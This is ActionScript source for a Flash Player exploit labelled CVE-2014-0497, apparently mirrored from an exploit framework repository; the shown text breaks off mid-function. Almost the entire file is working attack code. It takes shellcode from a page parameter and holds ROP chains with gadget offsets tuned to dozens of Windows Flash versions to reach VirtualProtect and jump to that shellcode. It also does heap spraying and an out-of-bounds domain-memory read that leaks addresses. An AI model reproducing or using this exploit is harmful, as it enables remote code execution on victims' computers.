Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/external/source/exploits/CVE-2014-0497/Vickers.as
Views: 11780
//Compile with mxmlc Vickers.as -o Vickers.swf
package
{
import flash.display.Sprite;
import flash.system.Capabilities;
import flash.utils.ByteArray;
import __AS3__.vec.Vector;
import flash.system.ApplicationDomain;
import avm2.intrinsics.memory.*;
public class Vickers extends Sprite
{
public static var shellcode:String;
public function Vickers()
{
var params = root.loaderInfo.parameters;
shellcode = params["id"];
while (true)
{
if (exploit()) break;
};
}
public function makePayload(vftableAddr:*, scAddr:*):ByteArray
{
var payload = null;
switch (Capabilities.os.toLowerCase())
{
case "windows xp":
case "windows vista":
case "windows server 2003 r2":
case "windows server 2003":
case "windows 7":
case "windows 7 x64":
case "windows server 2008 r2":
case "windows server 2008":
payload = makePayloadWinOther(vftableAddr, scAddr);
break;
case "windows 8":
case "windows 8 x64":
payload = makePayloadWin8(vftableAddr, scAddr);
break;
default:
return (null);
};
return (payload);
}
public function makePayloadWin8(vftableAddr:*, scAddr:*):ByteArray
{
var flash_base:uint = vftableAddr;
var flash_end:uint;
var rop_payload:ByteArray = new ByteArray();
rop_payload.position = 0;
rop_payload.endian = "littleEndian";
rop_payload.writeUnsignedInt((scAddr + 4));
switch (Capabilities.version.toLowerCase())
{
case "win 11,3,372,94":
flash_base = (flash_base - 9518744);
flash_end = (flash_base + 0xB10000);
rop_payload.writeUnsignedInt((flash_base + 0x401404)); // add esp, 0x44; ret
rop_payload.position = 64;
rop_payload.writeUnsignedInt((flash_base + 0x26525)); // xchg eax, esp; ret
rop_payload.position = 76;
rop_payload.writeUnsignedInt((flash_base + 0x10c5)); // pop eax; ret
rop_payload.writeUnsignedInt((flash_base + 0x817420)); // ptr to KERNEL32!VirtualProtectStub
rop_payload.writeUnsignedInt((flash_base + 0x9e16)); // mov eax, dword ptr [eax]; ret
rop_payload.writeUnsignedInt((flash_base + 0xcc022)); // push eax; ret
rop_payload.writeUnsignedInt((flash_base + 0x3157c)); // jmp esp ; ret after VirtualProtect
rop_payload.writeUnsignedInt(scAddr);
rop_payload.writeUnsignedInt(0x1000);
rop_payload.writeUnsignedInt(0x40);
rop_payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,3,375,10":
flash_base = (flash_base - 9589392);
flash_end = (flash_base + 0xB15000);
rop_payload.writeUnsignedInt((flash_base + 4220004));
rop_payload.position = 64;
rop_payload.writeUnsignedInt((flash_base + 142215));
rop_payload.position = 76;
rop_payload.writeUnsignedInt((flash_base + 4293));
rop_payload.writeUnsignedInt((flash_base + 8504352));
rop_payload.writeUnsignedInt((flash_base + 40214));
rop_payload.writeUnsignedInt((flash_base + 840082));
rop_payload.writeUnsignedInt((flash_base + 202134));
rop_payload.writeUnsignedInt(scAddr);
rop_payload.writeUnsignedInt(0x1000);
rop_payload.writeUnsignedInt(64);
rop_payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,3,376,12":
flash_base = (flash_base - 9593552);
flash_end = (flash_base + 0xB16000);
rop_payload.writeUnsignedInt((flash_base + 4220740));
rop_payload.position = 64;
rop_payload.writeUnsignedInt((flash_base + 142023));
rop_payload.position = 76;
rop_payload.writeUnsignedInt((flash_base + 4293));
rop_payload.writeUnsignedInt((flash_base + 8508448));
rop_payload.writeUnsignedInt((flash_base + 39878));
rop_payload.writeUnsignedInt((flash_base + 839538));
rop_payload.writeUnsignedInt((flash_base + 201958));
rop_payload.writeUnsignedInt(scAddr);
rop_payload.writeUnsignedInt(0x1000);
rop_payload.writeUnsignedInt(64);
rop_payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,3,377,15":
flash_base = (flash_base - 9589576);
flash_end = (flash_base + 0xB15000);
rop_payload.writeUnsignedInt((flash_base + 4220388));
rop_payload.position = 64;
rop_payload.writeUnsignedInt((flash_base + 141671));
rop_payload.position = 76;
rop_payload.writeUnsignedInt((flash_base + 4293));
rop_payload.writeUnsignedInt((flash_base + 8504352));
rop_payload.writeUnsignedInt((flash_base + 39526));
rop_payload.writeUnsignedInt((flash_base + 839698));
rop_payload.writeUnsignedInt((flash_base + 201590));
rop_payload.writeUnsignedInt(scAddr);
rop_payload.writeUnsignedInt(0x1000);
rop_payload.writeUnsignedInt(64);
rop_payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,3,378,5":
flash_base = (flash_base - 9589448);
flash_end = (flash_base + 0xB15000);
rop_payload.writeUnsignedInt((flash_base + 4220388));
rop_payload.position = 64;
rop_payload.writeUnsignedInt((flash_base + 141671));
rop_payload.position = 76;
rop_payload.writeUnsignedInt((flash_base + 4293));
rop_payload.writeUnsignedInt((flash_base + 8504352));
rop_payload.writeUnsignedInt((flash_base + 39526));
rop_payload.writeUnsignedInt((flash_base + 839698));
rop_payload.writeUnsignedInt((flash_base + 201590));
rop_payload.writeUnsignedInt(scAddr);
rop_payload.writeUnsignedInt(0x1000);
rop_payload.writeUnsignedInt(64);
rop_payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,3,379,14":
flash_base = (flash_base - 9597856);
flash_end = (flash_base + 0xB17000);
rop_payload.writeUnsignedInt((flash_base + 4575113));
rop_payload.position = 64;
rop_payload.writeUnsignedInt((flash_base + 6617808));
rop_payload.position = 76;
rop_payload.writeUnsignedInt((flash_base + 8149060));
rop_payload.writeUnsignedInt((flash_base + 8512544));
rop_payload.writeUnsignedInt((flash_base + 4907562));
rop_payload.writeUnsignedInt((flash_base + 8147977));
rop_payload.writeUnsignedInt((flash_base + 4046601));
rop_payload.writeUnsignedInt(scAddr);
rop_payload.writeUnsignedInt(0x1000);
rop_payload.writeUnsignedInt(64);
rop_payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,6,602,167":
flash_base = (flash_base - 9821704);
flash_end = (flash_base + 0xB85000);
rop_payload.writeUnsignedInt((flash_base + 8405950));
rop_payload.position = 64;
rop_payload.writeUnsignedInt((flash_base + 27456));
rop_payload.position = 76;
rop_payload.writeUnsignedInt((flash_base + 4293));
rop_payload.writeUnsignedInt((flash_base + 8791088));
rop_payload.writeUnsignedInt((flash_base + 73494));
rop_payload.writeUnsignedInt((flash_base + 1115794));
rop_payload.writeUnsignedInt((flash_base + 242790));
rop_payload.writeUnsignedInt(scAddr);
rop_payload.writeUnsignedInt(0x1000);
rop_payload.writeUnsignedInt(64);
rop_payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,6,602,171":
flash_base = (flash_base - 9821904);
flash_end = (flash_base + 0xB85000);
rop_payload.writeUnsignedInt((flash_base + 8406414));
rop_payload.position = 64;
rop_payload.writeUnsignedInt((flash_base + 27456));
rop_payload.position = 76;
rop_payload.writeUnsignedInt((flash_base + 4293));
rop_payload.writeUnsignedInt((flash_base + 8791088));
rop_payload.writeUnsignedInt((flash_base + 73078));
rop_payload.writeUnsignedInt((flash_base + 1116754));
rop_payload.writeUnsignedInt((flash_base + 242380));
rop_payload.writeUnsignedInt(scAddr);
rop_payload.writeUnsignedInt(0x1000);
rop_payload.writeUnsignedInt(64);
rop_payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,6,602,180":
flash_base = (flash_base - 9816600);
flash_end = (flash_base + 0xB84000);
rop_payload.writeUnsignedInt((flash_base + 8404478));
rop_payload.position = 64;
rop_payload.writeUnsignedInt((flash_base + 29514));
rop_payload.position = 76;
rop_payload.writeUnsignedInt((flash_base + 4293));
rop_payload.writeUnsignedInt((flash_base + 8786992));
rop_payload.writeUnsignedInt((flash_base + 69382));
rop_payload.writeUnsignedInt((flash_base + 175197));
rop_payload.writeUnsignedInt((flash_base + 238732));
rop_payload.writeUnsignedInt(scAddr);
rop_payload.writeUnsignedInt(0x1000);
rop_payload.writeUnsignedInt(64);
rop_payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,7,700,169":
flash_base = (flash_base - 10441412);
flash_end = (flash_base + 0xC45000);
rop_payload.writeUnsignedInt((flash_base + 4640769));
rop_payload.position = 64;
rop_payload.writeUnsignedInt((flash_base + 53338));
rop_payload.position = 76;
rop_payload.writeUnsignedInt((flash_base + 4293));
rop_payload.writeUnsignedInt((flash_base + 9368732));
rop_payload.writeUnsignedInt((flash_base + 95414));
rop_payload.writeUnsignedInt((flash_base + 1145506));
rop_payload.writeUnsignedInt((flash_base + 2156132));
rop_payload.writeUnsignedInt(scAddr);
rop_payload.writeUnsignedInt(0x1000);
rop_payload.writeUnsignedInt(64);
rop_payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,7,700,202":
flash_base = (flash_base - 0x9f5470);
flash_end = (flash_base + 0xC45000);
rop_payload.writeUnsignedInt((flash_base + 0x46c361));
rop_payload.position = 64;
rop_payload.writeUnsignedInt((flash_base + 0xcc5a));
rop_payload.position = 76;
rop_payload.writeUnsignedInt((flash_base + 0x10c5));
rop_payload.writeUnsignedInt((flash_base + 0x8ef49c));
rop_payload.writeUnsignedInt((flash_base + 0x17136));
rop_payload.writeUnsignedInt((flash_base + 0x42f0));
rop_payload.writeUnsignedInt((flash_base + 0x40664));
rop_payload.writeUnsignedInt(scAddr);
rop_payload.writeUnsignedInt(0x1000);
rop_payload.writeUnsignedInt(64);
rop_payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,7,700,224":
flash_base = (flash_base - 10450228);
flash_end = (flash_base + 0xC7A000);
rop_payload.writeUnsignedInt((flash_base + 4646881));
rop_payload.position = 64;
rop_payload.writeUnsignedInt((flash_base + 52090));
rop_payload.position = 76;
rop_payload.writeUnsignedInt((flash_base + 4293));
rop_payload.writeUnsignedInt((flash_base + 9376924));
rop_payload.writeUnsignedInt((flash_base + 93510));
rop_payload.writeUnsignedInt((flash_base + 1145378));
rop_payload.writeUnsignedInt((flash_base + 1909483));
rop_payload.writeUnsignedInt(scAddr);
rop_payload.writeUnsignedInt(0x1000);
rop_payload.writeUnsignedInt(64);
rop_payload.writeUnsignedInt((scAddr - 4));
break;
default:
return (null);
};
return (rop_payload);
}
public function makePayloadWinOther(vftableAddr:*, scAddr:*):ByteArray
{
var vftableAddr_copy:uint = vftableAddr;
var _local_5:uint;
var payload:ByteArray = new ByteArray();
payload.position = 0;
payload.endian = "littleEndian";
payload.writeUnsignedInt((scAddr + 4));
switch (Capabilities.version.toLowerCase())
{
case "win 11,0,1,152":
vftableAddr_copy = (vftableAddr_copy - 7628676);
_local_5 = (vftableAddr_copy + 0x927000);
payload.position = 8;
payload.writeUnsignedInt((vftableAddr_copy + 1041567));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 1937003));
payload.position = 80;
payload.writeUnsignedInt((vftableAddr_copy + 4585805));
payload.writeUnsignedInt((vftableAddr_copy + 6697912));
payload.writeUnsignedInt((vftableAddr_copy + 2201532));
payload.writeUnsignedInt((vftableAddr_copy + 3985044));
payload.writeUnsignedInt((vftableAddr_copy + 2764856));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,1,102,55":
vftableAddr_copy = (vftableAddr_copy - 7633040);
_local_5 = (vftableAddr_copy + 0x927000);
payload.position = 8;
payload.writeUnsignedInt((vftableAddr_copy + 4793772));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 1939267));
payload.position = 80;
payload.writeUnsignedInt((vftableAddr_copy + 2297101));
payload.writeUnsignedInt((vftableAddr_copy + 6702008));
payload.writeUnsignedInt((vftableAddr_copy + 3976335));
payload.writeUnsignedInt((vftableAddr_copy + 3516263));
payload.writeUnsignedInt((vftableAddr_copy + 2768033));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,1,102,62":
vftableAddr_copy = (vftableAddr_copy - 7628912);
_local_5 = (vftableAddr_copy + 0x927000);
payload.position = 8;
payload.writeUnsignedInt((vftableAddr_copy + 4794156));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 1939856));
payload.position = 80;
payload.writeUnsignedInt((vftableAddr_copy + 5126527));
payload.writeUnsignedInt((vftableAddr_copy + 6702008));
payload.writeUnsignedInt((vftableAddr_copy + 2920469));
payload.writeUnsignedInt((vftableAddr_copy + 4454837));
payload.writeUnsignedInt((vftableAddr_copy + 2768325));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,1,102,63":
vftableAddr_copy = (vftableAddr_copy - 7628904);
_local_5 = (vftableAddr_copy + 0x927000);
payload.position = 8;
payload.writeUnsignedInt((vftableAddr_copy + 4794076));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 1939822));
payload.position = 80;
payload.writeUnsignedInt((vftableAddr_copy + 5126435));
payload.writeUnsignedInt((vftableAddr_copy + 6702008));
payload.writeUnsignedInt((vftableAddr_copy + 2353542));
payload.writeUnsignedInt((vftableAddr_copy + 3516455));
payload.writeUnsignedInt((vftableAddr_copy + 2768305));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,2,202,228":
vftableAddr_copy = (vftableAddr_copy - 7726032);
_local_5 = (vftableAddr_copy + 0x93F000);
payload.position = 8;
payload.writeUnsignedInt((vftableAddr_copy + 4947482));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 2022234));
payload.position = 80;
payload.writeUnsignedInt((vftableAddr_copy + 6255948));
payload.writeUnsignedInt((vftableAddr_copy + 6824832));
payload.writeUnsignedInt((vftableAddr_copy + 5021261));
payload.writeUnsignedInt((vftableAddr_copy + 6176368));
payload.writeUnsignedInt((vftableAddr_copy + 2847152));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,2,202,233":
vftableAddr_copy = (vftableAddr_copy - 7729872);
_local_5 = (vftableAddr_copy + 0x93F000);
payload.position = 8;
payload.writeUnsignedInt((vftableAddr_copy + 4947594));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 2022508));
payload.position = 80;
payload.writeUnsignedInt((vftableAddr_copy + 4691374));
payload.writeUnsignedInt((vftableAddr_copy + 6824832));
payload.writeUnsignedInt((vftableAddr_copy + 4164715));
payload.writeUnsignedInt((vftableAddr_copy + 5837496));
payload.writeUnsignedInt((vftableAddr_copy + 2847021));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,2,202,235":
vftableAddr_copy = (vftableAddr_copy - 7734032);
_local_5 = (vftableAddr_copy + 0x940000);
payload.position = 8;
payload.writeUnsignedInt((vftableAddr_copy + 4947578));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 2022729));
payload.position = 80;
payload.writeUnsignedInt((vftableAddr_copy + 5249755));
payload.writeUnsignedInt((vftableAddr_copy + 6828928));
payload.writeUnsignedInt((vftableAddr_copy + 4261382));
payload.writeUnsignedInt((vftableAddr_copy + 4553024));
payload.writeUnsignedInt((vftableAddr_copy + 2847456));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,3,300,257":
vftableAddr_copy = (vftableAddr_copy - 8232016);
_local_5 = (vftableAddr_copy + 0x9C3000);
payload.position = 8;
payload.writeUnsignedInt((vftableAddr_copy + 5328586));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 2069614));
payload.position = 80;
payload.writeUnsignedInt((vftableAddr_copy + 6497300));
payload.writeUnsignedInt((vftableAddr_copy + 7222148));
payload.writeUnsignedInt((vftableAddr_copy + 5022322));
payload.writeUnsignedInt((vftableAddr_copy + 4972967));
payload.writeUnsignedInt((vftableAddr_copy + 3071572));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,3,300,273":
vftableAddr_copy = (vftableAddr_copy - 8236216);
_local_5 = (vftableAddr_copy + 0x9C4000);
payload.position = 8;
payload.writeUnsignedInt((vftableAddr_copy + 5331930));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 2070667));
payload.position = 80;
payload.writeUnsignedInt((vftableAddr_copy + 6500737));
payload.writeUnsignedInt((vftableAddr_copy + 7226252));
payload.writeUnsignedInt((vftableAddr_copy + 5142060));
payload.writeUnsignedInt((vftableAddr_copy + 5127634));
payload.writeUnsignedInt((vftableAddr_copy + 3074828));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,4,402,278":
vftableAddr_copy = (vftableAddr_copy - 8503560);
_local_5 = (vftableAddr_copy + 0xA23000);
payload.writeUnsignedInt((vftableAddr_copy + 5581452));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 1202409));
payload.position = 76;
payload.writeUnsignedInt((vftableAddr_copy + 6927402));
payload.writeUnsignedInt((vftableAddr_copy + 7480208));
payload.writeUnsignedInt((vftableAddr_copy + 5373116));
payload.writeUnsignedInt((vftableAddr_copy + 5713520));
payload.writeUnsignedInt((vftableAddr_copy + 3269652));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,4,402,287":
vftableAddr_copy = (vftableAddr_copy - 8507728);
_local_5 = (vftableAddr_copy + 0xA24000);
payload.writeUnsignedInt((vftableAddr_copy + 5582348));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 1202841));
payload.position = 76;
payload.writeUnsignedInt((vftableAddr_copy + 6927143));
payload.writeUnsignedInt((vftableAddr_copy + 7484304));
payload.writeUnsignedInt((vftableAddr_copy + 5481024));
payload.writeUnsignedInt((vftableAddr_copy + 5107604));
payload.writeUnsignedInt((vftableAddr_copy + 5747979));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,5,502,110":
vftableAddr_copy = (vftableAddr_copy - 11716376);
_local_5 = (vftableAddr_copy + 0xEC6000);
payload.position = 20;
payload.writeUnsignedInt((vftableAddr_copy + 9813154));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 448623));
payload.position = 96;
payload.writeUnsignedInt((vftableAddr_copy + 9326463));
payload.writeUnsignedInt((vftableAddr_copy + 10691852));
payload.writeUnsignedInt((vftableAddr_copy + 5731300));
payload.writeUnsignedInt((vftableAddr_copy + 8910259));
payload.writeUnsignedInt((vftableAddr_copy + 8630687));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,5,502,135":
vftableAddr_copy = (vftableAddr_copy - 11716400);
_local_5 = (vftableAddr_copy + 0xEC6000);
payload.writeUnsignedInt((vftableAddr_copy + 1101327));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 4733912));
payload.position = 76;
payload.writeUnsignedInt((vftableAddr_copy + 4540));
payload.writeUnsignedInt((vftableAddr_copy + 10691852));
payload.writeUnsignedInt((vftableAddr_copy + 28862));
payload.writeUnsignedInt((vftableAddr_copy + 512197));
payload.writeUnsignedInt((vftableAddr_copy + 1560889));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,5,502,146":
vftableAddr_copy = (vftableAddr_copy - 11716320);
_local_5 = (vftableAddr_copy + 0xEC6000);
payload.writeUnsignedInt((vftableAddr_copy + 1101327));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 4733912));
payload.position = 76;
payload.writeUnsignedInt((vftableAddr_copy + 4540));
payload.writeUnsignedInt((vftableAddr_copy + 10691852));
payload.writeUnsignedInt((vftableAddr_copy + 28862));
payload.writeUnsignedInt((vftableAddr_copy + 512197));
payload.writeUnsignedInt((vftableAddr_copy + 1560889));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,5,502,149":
vftableAddr_copy = (vftableAddr_copy - 11712240);
_local_5 = (vftableAddr_copy + 0xEC6000);
payload.position = 5;
payload.writeUnsignedInt((vftableAddr_copy + 10373824));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 4331881));
payload.position = 77;
payload.writeUnsignedInt((vftableAddr_copy + 9292830));
payload.writeUnsignedInt((vftableAddr_copy + 10691852));
payload.writeUnsignedInt((vftableAddr_copy + 5731956));
payload.writeUnsignedInt((vftableAddr_copy + 7150772));
payload.writeUnsignedInt((vftableAddr_copy + 3344264));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,6,602,168":
vftableAddr_copy = (vftableAddr_copy - 11825816);
_local_5 = (vftableAddr_copy + 0xEE9000);
payload.position = 5;
payload.writeUnsignedInt((vftableAddr_copy + 9924439));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 4370139));
payload.position = 77;
payload.writeUnsignedInt((vftableAddr_copy + 9564155));
payload.writeUnsignedInt((vftableAddr_copy + 10736920));
payload.writeUnsignedInt((vftableAddr_copy + 5830863));
payload.writeUnsignedInt((vftableAddr_copy + 9044861));
payload.writeUnsignedInt((vftableAddr_copy + 7984191));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,6,602,171":
vftableAddr_copy = (vftableAddr_copy - 11834040);
_local_5 = (vftableAddr_copy + 0xEEA000);
payload.position = 5;
payload.writeUnsignedInt((vftableAddr_copy + 9925589));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 4370636));
payload.position = 77;
payload.writeUnsignedInt((vftableAddr_copy + 9564442));
payload.writeUnsignedInt((vftableAddr_copy + 10741016));
payload.writeUnsignedInt((vftableAddr_copy + 5771380));
payload.writeUnsignedInt((vftableAddr_copy + 10153408));
payload.writeUnsignedInt((vftableAddr_copy + 7983199));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,6,602,180":
vftableAddr_copy = (vftableAddr_copy - 11824712);
_local_5 = (vftableAddr_copy + 0xEE9000);
payload.position = 5;
payload.writeUnsignedInt((vftableAddr_copy + 9923173));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 4368414));
payload.position = 77;
payload.writeUnsignedInt((vftableAddr_copy + 9562061));
payload.writeUnsignedInt((vftableAddr_copy + 10736920));
payload.writeUnsignedInt((vftableAddr_copy + 5828990));
payload.writeUnsignedInt((vftableAddr_copy + 9042989));
payload.writeUnsignedInt((vftableAddr_copy + 8661666));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,7,700,169":
vftableAddr_copy = (vftableAddr_copy - 12902952);
_local_5 = (vftableAddr_copy + 16904192);
payload.writeUnsignedInt((vftableAddr_copy + 1116239));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 10368763));
payload.position = 76;
payload.writeUnsignedInt((vftableAddr_copy + 2586086));
payload.writeUnsignedInt((vftableAddr_copy + 11752328));
payload.writeUnsignedInt((vftableAddr_copy + 32732));
payload.writeUnsignedInt((vftableAddr_copy + 8192266));
payload.writeUnsignedInt((vftableAddr_copy + 1578904));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,7,700,202":
vftableAddr_copy = (vftableAddr_copy - 0xc4f508);
_local_5 = (vftableAddr_copy + 0x101f000);
payload.position = 8;
payload.writeUnsignedInt((vftableAddr_copy + 0x7dfcd2)); // 107dfcd2 : add esp,44h ; ret
payload.position = 0x40;
payload.writeUnsignedInt((vftableAddr_copy + 0x12a269)); // 1012a269 : xchg edx,esp ; add eax,dword ptr [eax]; add byte ptr [edi+5Eh],bl ; pop ecx ; ret
payload.position = 0x50;
payload.writeUnsignedInt((vftableAddr_copy + 0xcb497)); // 100cb497 : pop eax ; ret
payload.writeUnsignedInt((vftableAddr_copy + 0xb35388)); // 10b35388 : ptr to VirtualProtect
payload.writeUnsignedInt((vftableAddr_copy + 0x110d3d)); // 10110d3d : mov eax,dword ptr [eax] ; ret
payload.writeUnsignedInt((vftableAddr_copy + 0x887362)); // 10887362 : push eax ; ret
payload.writeUnsignedInt((vftableAddr_copy + 0x331bff)); // 10331bff : jmp esp
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(0x40);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,8,800,97":
vftableAddr_copy = (vftableAddr_copy - 129165844);
_local_5 = (vftableAddr_copy + 16904192);
payload.position = 8;
payload.writeUnsignedInt(vftableAddr_copy);
payload.position = 16;
payload.writeUnsignedInt((vftableAddr_copy + 117625919));
payload.writeUnsignedInt(-1810746282);
payload.writeUnsignedInt((scAddr + 76));
payload.writeUnsignedInt((vftableAddr_copy + 122565891));
payload.position = 44;
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 0x0400));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 123362382));
payload.position = 80;
payload.writeUnsignedInt((scAddr + 192));
payload.position = 112;
payload.writeUnsignedInt((vftableAddr_copy + 32365));
payload.writeUnsignedInt((vftableAddr_copy + 11760520));
payload.writeUnsignedInt((vftableAddr_copy + 1117213));
payload.writeUnsignedInt((vftableAddr_copy + 3721232));
payload.writeUnsignedInt((vftableAddr_copy + 8274178));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
case "win 11,8,800,50":
vftableAddr_copy = (vftableAddr_copy - 12936000);
_local_5 = (vftableAddr_copy + 17149952);
payload.writeUnsignedInt((vftableAddr_copy + 404531));
payload.position = 64;
payload.writeUnsignedInt((vftableAddr_copy + 2583617));
payload.position = 72;
payload.writeUnsignedInt((vftableAddr_copy + 7914140));
payload.writeUnsignedInt((vftableAddr_copy + 4550));
payload.writeUnsignedInt((vftableAddr_copy + 11780992));
payload.writeUnsignedInt((vftableAddr_copy + 32684));
payload.writeUnsignedInt((vftableAddr_copy + 142358));
payload.writeUnsignedInt((vftableAddr_copy + 1577816));
payload.writeUnsignedInt(scAddr);
payload.writeUnsignedInt(0x1000);
payload.writeUnsignedInt(64);
payload.writeUnsignedInt((scAddr - 4));
break;
default:
return (null);
};
return (payload);
}
public function exploit():Boolean
{
var vector_objects_entry_length:int;
var shellcode_byte = null;
var _local_6:uint;
var i:int;
var vftable_addr:uint;
var shellcode_address:uint;
var vector_objects_entry_idx:uint;
var length_vector_byte_arrays:uint;
var vector_byte_arrays:Vector.<ByteArray> = new Vector.<ByteArray>(0);
var vector_objects:Vector.<Object> = new Vector.<Object>(0);
var twos_object:Object = new <Object>[2, 2, 2, 2, 2, 2, 2, 2];
var vickers_byte_array:ByteArray = new ByteArray();
while (i < 0x0500)
{
vector_byte_arrays[i] = new ByteArray();
vector_byte_arrays[i].length = ApplicationDomain.MIN_DOMAIN_MEMORY_LENGTH;
i++;
};
vickers_byte_array.writeUTFBytes("vickers");
vickers_byte_array.length = ApplicationDomain.MIN_DOMAIN_MEMORY_LENGTH;
ApplicationDomain.currentDomain.domainMemory = vickers_byte_array;
vector_byte_arrays[i] = new ByteArray();
vector_byte_arrays[i].length = ApplicationDomain.MIN_DOMAIN_MEMORY_LENGTH;
length_vector_byte_arrays = i;
i = 0;
while (i < (vector_byte_arrays.length - 1))
{
vector_byte_arrays[i++] = null;
};
i = 0;
while (i < 0x8000)
{
vector_objects[i] = new <Object>[i, twos_object, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1];
i++;
};
// _local_6 => nil => 0, makes li32(_local_6 - offset) makes it underflow!
// Example leak: 0275ef00 => 10c4f508 0000003b 00002326
if (((!((li16((_local_6 + 1)) == 114))) && (((vftable_addr = li32((_local_6 - 0x0100)) ) == 305419896))))
{
};
if (((!((li16((_local_6 + 1)) == 114))) && (((vector_objects_entry_idx = li32((_local_6 - 248)) ) == 305419896))))
{
};
vector_objects_entry_idx = (vector_objects_entry_idx >> 3);
if (((!((li16((_local_6 + 1)) == 114))) && (((vector_objects_entry_length = li32((_local_6 - 252)) ) == 305419896))))
{
};
// No success
if (vector_objects_entry_length != vector_objects[vector_objects_entry_idx].length)
{
vickers_byte_array = null;
